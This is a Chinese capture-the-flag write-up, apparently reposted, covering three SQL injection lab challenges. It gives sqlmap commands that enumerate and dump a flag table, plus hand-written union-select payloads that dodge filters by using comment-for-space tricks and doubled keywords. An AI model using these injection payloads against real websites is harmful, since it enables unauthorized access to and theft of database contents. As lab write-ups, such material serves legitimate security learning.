实验吧-web 简单的sql注入(合集,答案是一样的--_--)

Posted 白灬帆

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验吧-web 简单的sql注入(合集,答案是一样的--_--)相关的知识,希望对你有一定的参考价值。

简单的sql注入3

链接:http://ctf5.shiyanbar.com/web/index_3.php

输入1,页面显示hello,输入1\',页面报错

尝试一下用sqlmap跑,没想到就跑出来了     O(∩_∩)O哈哈~

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs

猜测在数据库web1里面

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1

明显在表flag里面

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1

就在此段flag里面了

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -C flag -T flag -D web1

 

简单的sql注入2

链接:http://ctf5.shiyanbar.com/web/index_2.php
试着先输入1,再输入1\',页面报语法错误,再输入1 \'页面出现SQLi detected!,推出空格被它过滤了

接下来有两种方法:用sqlmap或者手注

先手注

过滤的空格可以用/**/代替,查询当前数据库的表

\'/**/or/**/id=4/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/\'1\'=\'1

猜测在flag表里面

下面用sqlmap进行注入

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --tables -D web1

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --columns -T flag -D web1

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dump -C flag -T flag -D web1

 

3.简单的SQL注入

链接:http://ctf5.shiyanbar.com/423/web/

这道题也是sql注入,输入1,页面显示正常,输出1\',页面报错

之后通过输入查表字段,发现union select 被过滤了,这是想到用两个union表示

重复输入union select后发现空格也被过滤了,继续用两个空格代替一个空格

1.查询当前数据库

1\'  unionunion  selectselect  database()\'

 

2.查询数据库中的表

1\'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  \'1\'=\'1

3.查询字段名

1\' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name=\'flag

 

4.最后构造出1\'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  \'1\'=\'1

 

以上是关于实验吧-web 简单的sql注入(合集,答案是一样的--_--)的主要内容,如果未能解决你的问题,请参考以下文章

实验吧 简单的SQL注入1

简单的sql注入——实验吧

简单的sql注入之2——实验吧

实验吧web加了料的报错注入

实验吧web题(26/26)全writeup!超详细:)

ctf基于python脚本的sql注入合集(持续更新)